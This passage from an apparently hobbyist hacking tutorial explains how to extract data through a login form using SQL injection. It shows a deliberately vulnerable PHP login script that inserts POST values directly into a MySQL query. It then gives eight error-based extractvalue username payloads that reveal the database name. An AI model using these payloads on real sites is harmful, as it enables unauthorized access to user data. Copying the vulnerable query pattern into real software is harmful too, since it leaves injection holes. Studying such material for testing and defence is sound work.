Well the Trick is already discussed in earlier tutorials knowledge of those injections deeply is just enough to collect data from Login form. But just for a purpose of Tutorial and to open your mind towards this exploitation we are here discussing how to collect data from Login Form.

First of all there are Three ways of Achieving data from Login Forms.

1. Xpath Injection

2. Sub Query Injection

3. Blind Injection Both Techniques.

I strongly Suggest you to read them all as over here i wont be discussing in detail all these injections. As here we will discuss only some minor change in the injection and other things will remain same.

Same like Bypassing Login Form with SQL injection we will take a vulnerable Login script, and start exploring it.

$uname=$_POST['uname'];

$passwrd=$_POST['passwrd'];

$query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";

$result=mysql_query($query);

$rows = mysql_fetch_array($result);

if($rows)

{

echo "You have Logged in successfully" ;

create_session();

}

else  

{

Echo "Better Luck Next time";

}

Query

select username,pass from users where username='$uname' and password='$passwrd' limit 0,1

Injection

username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''=' username : " or extractvalue(0x0a,concat(0x0a,(select database()))) and ""=" username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --+ username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --+ username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) # username : " or extractvalue(0x0a,concat(0x0a,(select database()))) # username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) -- username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --

you can leave the password field empty. If the Page is actually vulnerable then surely one of the above will work and we will continue with that. Now lets see what will the query passed. For the above given Query first injection will work